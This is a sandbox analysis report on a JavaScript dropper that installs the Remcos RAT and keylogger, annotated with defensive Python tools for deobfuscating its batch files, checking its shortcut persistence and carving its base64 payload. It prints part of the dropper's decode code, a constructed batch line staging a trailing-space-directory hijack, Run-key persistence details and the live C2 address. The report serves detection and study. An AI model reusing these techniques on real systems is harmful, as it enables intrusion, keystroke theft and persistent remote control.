  |           +-- cmd.exe (started; badges 1) --> conhost.exe
  |           +-- cmd.exe (started; badges 1) --> conhost.exe
  +-- Ekbmajrx.PIF (started)
  |     signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Early bird code injection technique detected
  |     +-- colorcpl.exe (started)
  |           signatures: Detected Remcos RAT
  +-- Ekbmajrx.PIF (started)
        signatures: Allocates memory in foreign processes
        +-- colorcpl.exe (started)

Antivirus detection, submitted sample:

Source       Detection  Scanner        Label
6732832.js   48%        Virustotal
6732832.js   42%        ReversingLabs  Script-JS.Trojan.ModiLoader
6732832.js   100%       Avira          JS/TrojanDropper.MA

Antivirus detection, dropped files:

Source                                   Detection  Scanner        Label
C:\Users\user\Links\Ekbmajrx.PIF         100%       Avira          TR/AD.Remcos.lpmfw
C:\Users\user\AppData\Local\Temp\x.exe   100%       Avira          TR/AD.Remcos.lpmfw
C:\Users\user\AppData\Local\Temp\x.exe   75%        ReversingLabs  Win32.Backdoor.Remcos
C:\Users\user\AppData\Local\Temp\x.exe   40%        Virustotal
C:\Users\user\Links\Ekbmajrx.PIF         75%        ReversingLabs  Win32.Backdoor.Remcos
C:\Users\user\Links\Ekbmajrx.PIF         40%        Virustotal

No Antivirus matches (the three remaining antivirus tables are empty)
No contacted domains info
URLs found in memory or binary data:

Name                           Source                                                                                                Malicious  Reputation
http://geoplugin.net/json.gp   colorcpl.exe                                                                                          false      high
http://geoplugin.net/json.gp/C x.exe (00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp), x.exe (00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp), colorcpl.exe (00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp), colorcpl.exe (00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp), colorcpl.exe (00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp)   false      high
http://www.pmail.com           x.exe (00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp), x.exe (00000003.00000003.1234992961.000000007EDE4000.00000004.00001000.00020000.00000000.sdmp), x.exe (00000003.00000002.1267818979.0000000020693000.00000004.00001000.00020000.00000000.sdmp), x.exe (00000003.00000003.1234397390.000000007EDF4000.00000004.00001000.00020000.00000000.sdmp)   false      high

The geoplugin.net URL is rated benign because the service itself is legitimate; it is the geolocation lookup Remcos performs to record the victim's country, so a request to it from an unexpected process (here colorcpl.exe) is worth alerting on even though the domain is not malicious.
Contacted IPs:

IP             Domain   Country     ASN    ASN Name          Malicious
196.251.83.79  unknown  Seychelles  37417  SONIC-WirelessZA  true
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1639312
                            Start date and time:2025-03-15 09:30:23 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 57s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • GSI enabled (Javascript)
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:6732832.js
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.expl.evad.winJS@19/7@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 71
                            • Number of non-executed functions: 235
                            Cookbook Comments:
                            • Found application associated with file extension: .js
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.199.214.10, 4.245.163.56
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
04:31:18  API Interceptor  2x Sleep call for process: x.exe modified
04:31:29  API Interceptor  2x Sleep call for process: Ekbmajrx.PIF modified
04:31:54  API Interceptor  2097339x Sleep call for process: colorcpl.exe modified
09:31:21  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ekbmajrx C:\\Users\\user\\Links\Ekbmajrx.url
09:31:29  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ekbmajrx C:\\Users\\user\\Links\Ekbmajrx.url
No context
No context

Context match: SONIC-WirelessZA (other samples that contacted the same ASN)

Associated Sample Name / URL                              Detection  Threat Name  Context IP
hgfs.mips.elf                                             malicious  Unknown      196.251.81.246
hgfs.arm5.elf                                             malicious  Unknown      196.251.81.246
hgfs.mpsl.elf                                             malicious  Unknown      196.251.81.246
hgfs.x86.elf                                              malicious  Unknown      196.251.81.246
hgfs.arm.elf                                              malicious  Unknown      196.251.81.246
payment confirmation.exe                                  malicious  AgentTesla   196.251.83.222
purchase order T&B19-20PO128.exe                          malicious  AgentTesla   196.251.83.222
SecuriteInfo.com.Win32.CrypterX-gen.25378.7586.exe        malicious  AgentTesla   196.251.83.222
demon.arm.elf                                             malicious  Unknown      196.251.81.246
demon.mpsl.elf                                            malicious  Unknown      196.251.81.246

No context
No context
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (577), with CRLF line terminators
                            Category:dropped
                            Size (bytes):2860
                            Entropy (8bit):4.335677764406247
                            Encrypted:false
                            SSDEEP:48:TpaPBLhRc/CQmhbR7T7RUHthMqH+2kWqedNhxeuMAvI7y2Ge4aTt:TpaPNSxYxTNcP+AXrvI+2a+t
                            MD5:9A020804EBA1FFAC2928D7C795144BBF
                            SHA1:61FDC4135AFDC99E106912AEAFEAC9C8A967BECC
                            SHA-256:A86C6C7A2BF9E12C45275A5E7EBEBD5E6D2BA302FE0A12600B7C9FDF283D9E63
                            SHA-512:42F6D754F1BDBEB6E4CC7AEB57FF4C4D126944F950D260A0839911E576AD16002C16122F81C1D39FA529432DCA0A48C9ACFBB18804CA9044425C8E424A5518BE
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@%.....%e%........r%c%....r%h%rr%o%.o...% %... ..%o%..%f%r..r...%f%.. ......%.."%........%C% %:% .%\%.........%W% ...o.. .%i%...o...%n%o..r.....%d%.........%o%. ..%w%....r.%s%....% %...%\%.o....%S%... %y%.. ....%s%...%W% .%O%....%W%...%6%o.o.r%4%......%\%....%s%....%v%.........%c%......%h%..%o%.......%s%......%t%....o.....%.%.........%p%.......%i%.....%f%... .r...%"%..% % ...%>%.........%n%..........%u%.........o%l%.. .o...% %.r...r...% % ..%&%.......o%..p%........
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                            Category:dropped
                            Size (bytes):19854
                            Entropy (8bit):4.799579726516822
                            Encrypted:false
                            SSDEEP:384:cI9V3jUBZ6ocTNjb6yy2gbQ7AI8VbBR8blGXsfVsqvLWUzz2:cIzjMwF8yy2gbQ7KObcXvwLZ2
                            MD5:1DF650CCA01129127D30063634AB5C03
                            SHA1:BC7172DEC0B12B05F2247BD5E17751EB33474D4E
                            SHA-256:EDD4094E7A82A6FF8BE65D6B075E9513BD15A6B74F8032B5C10CE18F7191FA60
                            SHA-512:0BDDF9ECAAEDB0C30103A1FBFB644D6D4F7608BD596403307ED89B2390568C3A29E2CF55D10E2EADBFC407EDE52EAF9A4F2321BA5F37E358A1039F73C7688FBD
                            Malicious:false
                            Preview:@%........%e%..... ....%c%.. .. ..%h%.....%o% % %..o.... %o%.%f%..%f%...%..c%...r...%l%......%s%... .%..@%.....%e%..%c%.....%h%... .....%o% .. % %. ...%o%........%f%.%f%..........%..s%. . ... %e%...... ...%t%.. .. .% %.....%"%.....%s%. ..%Z%.....%k%...%r% .... ...%=%.........%s%. %e%.%t%....... ..% %. ...... %"%.......%..%sZkr%"%... .. ...%t%...%w%..%V%.... .%Y%.....%=% ...... .%=%. .....%"%.. . ....%..%sZkr%"%.......%t%.%A%.....%h%......%U%....%M%.... . %m%........%L% .....%r%.%f%..%R%... %%twVY%r%.%e%.. . . ..%m%..........% %. .%"%..%..%sZkr%"%. .....%K%. ..%j% %M% ......%q%.... .....%h%...%Y% ...%E%.. %O%.
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (372), with CRLF line terminators
                            Category:dropped
                            Size (bytes):17570
                            Entropy (8bit):4.749675665870814
                            Encrypted:false
                            SSDEEP:384:7ChtOaPnz/rMnYsfg0fluW0mCRe9eRPCRpKJhF52Dn5Uo3:7atrYRg0tuWV8e0qRpym5U2
                            MD5:5BAF253744AD26F35BA17DB6B80763E9
                            SHA1:6235B00643E324AC5FEA07F9ADAE9F2A0DB56B99
                            SHA-256:9CBB41E6C4F8565A6D121B770FCF3F15A6891C8DF8BFBA6D0414B3AD3298BDBA
                            SHA-512:5C949A081D922963745A3F0DEEE87C9D862D278889A6C7790AABF34BC09E04DCE7B3AB41EF7A4F584571CCA739AF0A1DEA4FA244C378696AC7EA6D6AC9B415F8
                            Malicious:false
                            Preview:@%... ...%e%....%c%........ .%h%.%o% ...... .% %.....%o%...... ..%f%.... %f%....%..s%... .%e%... ..%t% ........% %.......%"% ..%o%....... .%R%.... ...%W%....%d%......%=%...%s%.. ... %e%........ %t%.... % %. . . .%"%.. .......%..%oRWd%"%..%E%......%V% ...... ..%O%...%s%.. %=% .... %=%..... .%"%...%..%oRWd%"%. . .....%H%....... ..%F% .......%u%...%B%. . ...%q%..%x%... .%m%... ... .%o%....%X%.. .%C%... .%%EVOs%C%....... .%l% .%o%........%a%...... .%"%.. . %..%oRWd%"%.... .....%C%...%l%. .... ..%K%.....%K%... ... %T%.....%x%... %k%.. ... %q%..... ....%R%.. ... %w%.%%EVOs%r%. ... ...%e%..... ..%m%...% %......%"% ...%..%oRWd%"%. %C%. . .%M%....%m%.
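The three text files x.exe drops (above) share one obfuscation: every real character of a batch script is separated by a %...% reference to a variable that is never defined, which cmd.exe expands to nothing inside a batch file, so each preview spells "@echo off" once the references are removed. Read that way, the first preview appears to continue with a quoted path under C:\Windows \SysWOW64\ (a space after Windows, the trailing-space directory behind the report's "DLL Search Order Hijacking Via Additional Space in Path" Sigma hit), and the second and third define helper variables with set "sZkr=..." and reuse them so that later lines only make sense after expansion. The Python below is an added example, not part of the report: a static expander that drops undefined references, records set definitions so later references resolve, keeps well-known system variables symbolic, and flags paths with a trailing-space component. Its input is a constructed script in the same style (the variable names and commands are invented, not the report's files); delayed expansion (!x!), set /a and for-loop variables are out of scope.

```python
import re

# %name% reference; inside a batch file cmd.exe replaces a reference to an
# undefined variable with the empty string, which is what this obfuscator relies on.
VAR_RE = re.compile(r'%([^%\r\n]*)%')
# set "name=value"  or  set name=value  (value may contain spaces and '=')
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
# A drive path in which some directory component ends with a space, e.g. C:\Windows \...
SPACE_DIR_RE = re.compile(r'[A-Za-z]:\\[^"\r\n]*? \\[^"\r\n]*')

# Well-known system variables are kept symbolic (this table is the example's own choice)
# so the analyst still sees "%TEMP%" rather than an empty string.
KNOWN = {k.lower(): '%' + k + '%' for k in
         ('TEMP', 'TMP', 'SystemRoot', 'windir', 'APPDATA', 'LOCALAPPDATA',
          'USERPROFILE', 'ProgramData', 'COMSPEC', 'USERNAME')}

# Constructed sample in the style of the dropped files (invented names and commands).
SAMPLE = (
    '@%Qz%e%rt%c%Yu%h%iOp%o%aS% %dF%o%gH%f%jK%f\r\n'
    'set "sZkr=set "\r\n'
    '%sZkr%"twVY=%Uy%C:\\Windows \\SysWOW64\\%Hh%"\r\n'
    '%sZkr%"rEm=cmd /c "\r\n'
    '%rEm%copy %Tq%"%SystemRoot%\\SysWOW64\\colorcpl.exe"%Ww% "%twVY%" >nul 2>&1\r\n'
    '%Tq%"%twVY%svchost.pif"%Ww% >nul 2>&1\r\n'
)


def expand(line, env):
    """Resolve %name% references against env; '%%' is a literal percent sign."""
    def repl(m):
        name = m.group(1)
        if name == '':
            return '%'
        return env.get(name.lower(), '')   # undefined -> removed
    return VAR_RE.sub(repl, line)


def deobfuscate_batch(text):
    """Expand the script line by line, learning variables from set statements as they appear."""
    env = dict(KNOWN)
    out = []
    for raw in text.splitlines():
        line = expand(raw, env)
        m = SET_RE.match(line)          # a set may itself have been hidden behind a variable
        if m:
            env[m.group(1).lower()] = m.group(2)
        out.append(line)
    return out


def suspicious_paths(lines):
    """Paths containing a directory name that ends with a space (search-order hijack dirs)."""
    hits = set()
    for line in lines:
        hits.update(SPACE_DIR_RE.findall(line))
    return sorted(hits)


if __name__ == '__main__':
    cleaned = deobfuscate_batch(SAMPLE)
    print('\n'.join(cleaned))
    print('trailing-space paths:', suspicious_paths(cleaned))
```

The expander is deliberately static: it never runs the script, and it resolves references in file order, which is how cmd.exe treats %var% in a batch file without delayed expansion. Run it on the actual dropped files (after converting from UTF-8 with CRLF) to get the readable command sequence; anything it leaves unresolved is either a runtime-only construct or a variable defined outside the file.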
                            Process:C:\Windows\SysWOW64\colorcpl.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):234
                            Entropy (8bit):3.355278208510733
                            Encrypted:false
                            SSDEEP:3:rgl/lQlFxnfscl5JWRal2Jl+7R0DAlBG4moojklovDl6ALilXIkqoojklovDl6v:Ml/lQloU5YcIeeDAlS1gWAAe5q1gWAv
                            MD5:53D663FC540711F41D43C2770881C29D
                            SHA1:151F43A18C1B9D0429FD5912B16E8CAEB5744B21
                            SHA-256:5FB2A523BA39E3DBEFCBC645C21A77EC1AC84DB059D68B70FC7547D17E3FBEFD
                            SHA-512:27ECBC390F6EBBD58F7F503B66418A8AC59048DA65D63F2F6947AF15E8125BCE7B468B9A825A4066C0C3462595A073E2A9DEA3CE0AD79D2ED100855904082D61
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:....[.2.0.2.5./.0.3./.1.5. .0.4.:.3.1.:.2.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
(The preview is UTF-16LE text, each character followed by a null byte; decoded it reads "[2025/03/15 04:31:21 Offline Keylogger Started]", then "[Run]", "[Program Manager]", "[Win]r", "[Run]", "[Program Manager]": the keylogger records the foreground window title in brackets and the keystrokes typed into it, here the Win+R shortcut that opened the Run dialog.)
Process:C:\Windows\System32\wscript.exe (per the behavior graph this is the PE wscript.exe drops as C:\Users\user\AppData\Local\Temp\x.exe)
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1964032
                            Entropy (8bit):7.560180457448318
                            Encrypted:false
                            SSDEEP:24576:L3pqOxNFmvKAM+Dpg041zNic8UE+wpJauLmz0fAZ5OrBwIkXNSgIc1qGg9F:L3pTmkzN7nE+wpJ3Lmz0fYxzDg9F
                            MD5:56432B42A6DF492A60F9577716132B79
                            SHA1:6A733D64CB6184873C052EC1FEDB2B4F49D043A1
                            SHA-256:F75106426F6B4495215DB92302E1316BB24BEB1DFBBC97C3F5FE217E12C9A8A8
                            SHA-512:461EE555A47FDDBF9F55A6208F284C0DD0A88D8D481794E9DE53EFA04BAEB4B77C43F4D6887989889C0DE3F0328A32F84BA1CE5BF982D67954D9E49008B8540E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 75%
                            • Antivirus: Virustotal, Detection: 40%, Browse
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@..............................n(...`...&.......................|..................................................`...H............................text...t........................... ..`.itext..T........................... ..`.data...."... ...$..................@....bss.....6...P.......(...................idata..n(.......*...(..............@....tls....4............R...................rdata...............R..............@..@.reloc...|.......~...T..............@..B.rsrc....&...`...&..................@..@....................................@..@................................................................................................
Process:C:\Users\user\AppData\Local\Temp\x.exe (per the behavior graph this is the copy x.exe drops as C:\Users\user\Links\Ekbmajrx.PIF; its hashes are identical to the file above)
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1964032
                            Entropy (8bit):7.560180457448318
                            Encrypted:false
                            SSDEEP:24576:L3pqOxNFmvKAM+Dpg041zNic8UE+wpJauLmz0fAZ5OrBwIkXNSgIc1qGg9F:L3pTmkzN7nE+wpJ3Lmz0fYxzDg9F
                            MD5:56432B42A6DF492A60F9577716132B79
                            SHA1:6A733D64CB6184873C052EC1FEDB2B4F49D043A1
                            SHA-256:F75106426F6B4495215DB92302E1316BB24BEB1DFBBC97C3F5FE217E12C9A8A8
                            SHA-512:461EE555A47FDDBF9F55A6208F284C0DD0A88D8D481794E9DE53EFA04BAEB4B77C43F4D6887989889C0DE3F0328A32F84BA1CE5BF982D67954D9E49008B8540E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 75%
                            • Antivirus: Virustotal, Detection: 40%, Browse
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@..............................n(...`...&.......................|..................................................`...H............................text...t........................... ..`.itext..T........................... ..`.data...."... ...$..................@....bss.....6...P.......(...................idata..n(.......*...(..............@....tls....4............R...................rdata...............R..............@..@.reloc...|.......~...T..............@..B.rsrc....&...`...&..................@..@....................................@..@................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Links\\Ekbmajrx.PIF">), ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):102
                            Entropy (8bit):5.138899455452757
                            Encrypted:false
                            SSDEEP:3:HRAbABGQYmTWAX+eLCMCIEPLCHysbxusvcP5ov:HRYFVmTWDeLPwzCSExuOcP2v
                            MD5:4F81E9AAC293C160319B7F34FD9626E8
                            SHA1:907CE417004F900CA1D366434F03197CFDCE4824
                            SHA-256:178A1B09D1D71B147DD043BC97D736DCD050FB05FBF4FA437F7D661057DA5660
                            SHA-512:CB98A49238145BF3CE850CC264AF1CC5BF558A5C6A9D2F11D6F1A5E1CE9F4C7F412951E1CEDA80072D6070E9319F657E808817AE7FEC754600595DBDE20017F5
                            Malicious:false
                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\user\\Links\\Ekbmajrx.PIF"..IconIndex=978402..HotKey=80..
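The Run key entries logged at 09:31:21 and 09:31:29 point at C:\Users\user\Links\Ekbmajrx.url, and that shortcut's URL is a file: reference to Ekbmajrx.PIF in the same folder, so at logon the shell resolves the shortcut and launches the PIF (a .PIF is treated as an executable). The Python below is an added example, not part of the report: it parses an [InternetShortcut] file and flags the properties that make this one a persistence vehicle. URL_FILE is the shortcut text from the dropped-files entry above (note the literal doubled backslashes inside the quoted URL); the extension list and the findings wording are the example's own.

```python
import ntpath
import re
from urllib.parse import unquote

# Extensions the shell will execute when the shortcut target is opened
# (the example's own list, not exhaustive).
EXECUTABLE_EXT = {'.pif', '.exe', '.com', '.scr', '.bat', '.cmd', '.js', '.jse',
                  '.vbs', '.vbe', '.wsf', '.hta', '.lnk', '.ps1'}

# The .url file from the report's dropped-files list, byte for byte.
URL_FILE = ('[InternetShortcut]\r\n'
            'URL=file:"C:\\\\Users\\\\user\\\\Links\\\\Ekbmajrx.PIF"\r\n'
            'IconIndex=978402\r\n'
            'HotKey=80\r\n')


def parse_internet_shortcut(text):
    """Key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    section, keys = None, {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1].lower()
        elif section == 'internetshortcut' and '=' in line:
            k, v = line.split('=', 1)
            keys[k.strip().lower()] = v.strip()
    return keys


def local_target(url):
    """Path a file: URL resolves to (Windows form), or None for any other scheme."""
    if not url.lower().startswith('file:'):
        return None
    path = unquote(url[5:].strip().strip('"'))
    if path.startswith('///'):           # file:///C:/... form
        path = path[3:]
    return path.replace('\\\\', '\\').replace('/', '\\')


def assess_url_shortcut(text):
    """Return the resolved target and the reasons (if any) the shortcut looks like a launcher."""
    keys = parse_internet_shortcut(text)
    target = local_target(keys.get('url', ''))
    findings = []
    if target is not None:
        ext = ntpath.splitext(target)[1].lower()
        if ext in EXECUTABLE_EXT:
            findings.append('file: URL points at an executable type (%s)' % ext)
        if re.search(r'\\users\\[^\\]+\\', target, re.IGNORECASE):
            findings.append('target is under a user profile (user-writable location)')
    if keys.get('hotkey', '0') not in ('', '0'):
        findings.append('HotKey is set (shortcut also fires on a key combination)')
    return {'target': target, 'findings': findings, 'suspicious': bool(findings)}


if __name__ == '__main__':
    result = assess_url_shortcut(URL_FILE)
    print(result['target'])
    for f in result['findings']:
        print(' -', f)
```

On a live host the same check belongs next to a walk of the Run/RunOnce values: any value whose target is a .url (or .lnk) is worth resolving one hop further, because the registry value alone looks like a harmless shortcut.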
                            File type:ASCII text, with very long lines (65438), with CRLF line terminators
                            Entropy (8bit):5.835753755969207
                            TrID:
                              File name:6732832.js
                              File size:2'619'064 bytes
                              MD5:f497655b5c7c0834be1fe0ea0eb7493c
                              SHA1:b8e7608a478d0b50547e758f4a6567823fa3f311
                              SHA256:53bcd29a7e6afd5ff7e507a36fc47c7696106c54259bd8c10c76ac6716fda0ae
                              SHA512:0694780d6c2becce356e1aa221e06a7dc6d675d8328a6e7b641c1ce2c967a3b6655bddf6d3296a24e68f3f05ab9a8641158f7318bdd9e174f2fba3ea485aac14
                              SSDEEP:49152:PEo4ogzB/y7CkkPYFnozJ95atNzakAQ8b/s1R0d:0
                              TLSH:1DC5E13C4706AD6627BC16F4C81C29805EBC15779784ABE8AE7E40FF267D702876D4AC
                              File Content Preview:var D=new ActiveXObject("Microsoft.XMLDOM")..var E=D.createElement("t")..E.dataType="bin.base64"..E.text="TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV
                              Icon Hash:68d69b8bb6aa9a86
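The File Content Preview shows the dropper's decode trick: it creates an MSXML DOM element, sets its dataType to bin.base64 and assigns a base64 string to .text, after which the element's nodeTypedValue yields the decoded bytes ready to be written to disk (the write-out code is beyond the preview and is not assumed here). The blob begins with TVpQ, which is base64 for MZP, the DOS-stub marker the dropped PE previews start with. The Python below is an added example, not part of the report: a triage carver that pulls the blob out of such a script, decodes it and sanity-checks the MZ and PE headers. SAMPLE_JS is a constructed stand-in carrying a 68-byte dummy PE rather than the real 2.6 MB payload; PAGE_BLOB_PREFIX is the first 40 characters of the report's own blob.

```python
import base64
import hashlib
import re

# First 40 base64 characters exactly as shown in the report's File Content Preview.
PAGE_BLOB_PREFIX = 'TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAA'

# Constructed dummy PE: "MZP" stub, e_lfanew (offset 0x3C) pointing at a "PE\0\0" signature at 0x40.
DUMMY_PE = b'MZP' + b'\x00' * 57 + (0x40).to_bytes(4, 'little') + b'PE\x00\x00'


def make_js(blob):
    """Build a script with the same XMLDOM / bin.base64 shape as the preview (constructed)."""
    return ('var D=new ActiveXObject("Microsoft.XMLDOM")\r\n'
            'var E=D.createElement("t")\r\n'
            'E.dataType="bin.base64"\r\n'
            'E.text="%s"\r\n' % blob)


SAMPLE_JS = make_js(base64.b64encode(DUMMY_PE).decode())

# The base64 assignment that follows a bin.base64 dataType; whitespace inside the blob is tolerated.
BLOB_RE = re.compile(r'dataType\s*=\s*"bin\.base64"[\s\S]*?\.text\s*=\s*"([A-Za-z0-9+/=\s]+)"')


def carve_base64_payload(js_text):
    """Return (info, bytes) for the embedded blob, or (None, b'') if the pattern is absent."""
    m = BLOB_RE.search(js_text)
    if not m:
        return None, b''
    data = base64.b64decode(re.sub(r'\s+', '', m.group(1)))
    info = {'size': len(data), 'sha256': hashlib.sha256(data).hexdigest(),
            'mz': data[:2] == b'MZ', 'pe_sig': False, 'e_lfanew': None}
    if info['mz'] and len(data) >= 0x40:          # need the full DOS header to read e_lfanew
        e_lfanew = int.from_bytes(data[0x3C:0x40], 'little')
        info['e_lfanew'] = e_lfanew
        info['pe_sig'] = data[e_lfanew:e_lfanew + 4] == b'PE\x00\x00'
    return info, data


if __name__ == '__main__':
    info, data = carve_base64_payload(SAMPLE_JS)
    print(info)
    # On the real sample, write `data` out and hash it; the expected file is
    # C:\Users\user\AppData\Local\Temp\x.exe from the dropped-files list.
```

The MZ check alone is not enough: a 40-character prefix such as PAGE_BLOB_PREFIX decodes to a valid "MZP" start but is too short to contain e_lfanew, so the carver reports mz=True, pe_sig=False, which is the signal to look for a truncated or multi-part blob rather than a PE.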
                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                              2025-03-15T09:31:22.521437+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49693 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:25.137339+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49696 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:27.761668+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49697 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:30.406679+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49698 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:33.063665+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49699 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:35.703350+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49702 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:38.345431+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49703 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:40.984604+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49704 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:43.613149+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49705 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:46.269344+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49706 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:48.910089+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49707 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:51.534932+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49708 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:54.176298+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49709 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:56.800273+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49710 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:31:59.457500+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49711 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:32:02.097409+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49712 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:32:04.738636+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49713 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:32:07.394972+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49714 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:32:10.020325+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49716 | 196.251.83.79 | 786 | TCP
                              2025-03-15T09:32:12.675501+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49718 | 196.251.83.79 | 786 | TCP
